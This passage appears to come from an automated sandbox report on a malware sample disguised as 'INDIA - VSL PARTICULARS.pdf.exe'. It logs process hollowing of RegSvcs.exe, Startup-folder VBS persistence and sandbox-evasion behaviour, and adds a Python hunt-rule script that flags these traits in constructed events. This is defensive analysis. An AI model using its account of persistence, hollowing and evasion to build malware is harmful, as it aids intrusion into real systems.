    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
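The process tree in this report has three features worth turning into hunt logic: the lure carries a document extension in front of .exe; RegSvcs.exe is started with the command line of another file (name.exe or the lure itself), which is what a hollowed host looks like in process-creation telemetry; and after persistence the whole chain starts from wscript.exe running a .vbs in the user's Startup folder. The block below is an added example, not part of the report or of any vendor's rules. It applies those three checks, plus the combined chain, to constructed Sysmon-style events whose field names, PIDs and the list of .NET utilities commonly used as hollowing hosts are my assumptions.

```python
"""Hunt rules for the execution chain in this report, applied to constructed
Sysmon-style process-creation events (added example; field names assumed)."""
import ntpath
import re
from dataclasses import dataclass

DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
EXEC_EXTS = {".exe", ".scr", ".com", ".pif"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed list of .NET utilities frequently chosen as hollowing targets.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # executable actually mapped into the process
    cmdline: str   # command line handed to CreateProcess


def argv(cmdline):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def double_extension(image):
    """True for names like report.pdf.exe: executable extension behind a document one."""
    root, ext = ntpath.splitext(ntpath.basename(image).lower())
    return ext in EXEC_EXTS and ntpath.splitext(root)[1] in DOC_EXTS


def image_cmdline_mismatch(ev):
    """The mapped executable is not the one the command line names
    (image RegSvcs.exe, command line "...\\name.exe" in this report)."""
    args = argv(ev.cmdline)
    claimed = ntpath.basename(args[0]).lower() if args else ""
    return bool(claimed) and claimed != ntpath.basename(ev.image).lower()


def startup_script_launch(ev):
    """wscript/cscript started with a script that lives in the user's Startup folder."""
    if ntpath.basename(ev.image).lower() not in SCRIPT_HOSTS:
        return False
    return any(STARTUP_DIR in a.lower() and ntpath.splitext(a.lower())[1] in SCRIPT_EXTS
               for a in argv(ev.cmdline)[1:])


def evaluate(events):
    """Return (rule, pid) findings; the chain rule walks two parents up the tree."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if double_extension(ev.image):
            findings.append(("double_extension", ev.pid))
        if startup_script_launch(ev):
            findings.append(("startup_script_launch", ev.pid))
        if image_cmdline_mismatch(ev):
            findings.append(("image_cmdline_mismatch", ev.pid))
            parent = by_pid.get(ev.ppid)
            grand = by_pid.get(parent.ppid) if parent else None
            if (ntpath.basename(ev.image).lower() in DOTNET_HOSTS
                    and grand is not None and startup_script_launch(grand)):
                findings.append(("startup_script_to_hollowed_host", ev.pid))
    return findings


# Constructed events mirroring this report's process tree (PIDs invented).
LURE = r"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
NAME_EXE = r"C:\Users\user\AppData\Local\directory\name.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
VBS = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
EVENTS = [
    ProcEvent(100, 1, LURE, f'"{LURE}"'),
    ProcEvent(101, 100, NAME_EXE, f'"{LURE}"'),      # dropped copy, parent's cmdline
    ProcEvent(102, 101, REGSVCS, f'"{LURE}"'),       # hollowed host
    ProcEvent(200, 1, r"C:\Windows\System32\wscript.exe",
              f'"C:\\Windows\\System32\\WScript.exe" "{VBS}"'),   # next logon
    ProcEvent(201, 200, NAME_EXE, f'"{NAME_EXE}"'),
    ProcEvent(202, 201, REGSVCS, f'"{NAME_EXE}"'),   # hollowed host again
    ProcEvent(300, 1, REGSVCS, f'"{REGSVCS}" /u some.dll'),   # benign control
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:34} pid={pid}")
```

The mismatch rule is the noisy one: anything started through CreateProcess with an explicit lpApplicationName and a foreign command line trips it, so keep it as a scoring signal and let the chain rule (Startup script, two hops, .NET host with foreign command line) carry the alert.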

    Hooking and other Techniques for Hiding and Protection

    Source: Possible double extension: pdf.exeStatic PE information: INDIA - VSL PARTICULARS.pdf.exe
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_0047A330
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00434418
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\directory\name.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
    Source: C:\Users\user\AppData\Local\directory\name.exe | API/Special instruction interceptor: Address: 3FD32B4
    Source: C:\Users\user\AppData\Local\directory\name.exe | API/Special instruction interceptor: Address: 3F1FAA4
    Source: C:\Users\user\AppData\Local\directory\name.exe | API/Special instruction interceptor: Address: 3F932B4
    Source: C:\Users\user\AppData\Local\directory\name.exe | API/Special instruction interceptor: Address: 3EF027C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599765
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599525
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599243
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599125
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599016
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598781
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598672
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598438
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598313
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598188
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597969
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597844
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596141
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596031
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595922
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595813
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595688
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595453
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595344
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595219
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594200
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594016
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593888
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593782
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593657
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593532
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599438
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599324
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599215
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599109
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598973
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598849
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598281
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598171
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598062
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597953
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597844
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597734
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597625
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597516
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597156
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597047
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596937
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596384
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596273
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596166
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596047
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595937
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595828
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595141
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595031
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594922
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594813
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594688
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594453
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594344
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1551
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8269
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1941
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7903
    Source: C:\Users\user\AppData\Local\directory\name.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | API coverage: 3.6 %
    Source: C:\Users\user\AppData\Local\directory\name.exe | API coverage: 3.8 %
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045DE8F FindFirstFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599525
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599243
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599125
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599016
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598672
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598438
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598188
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597969
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597844
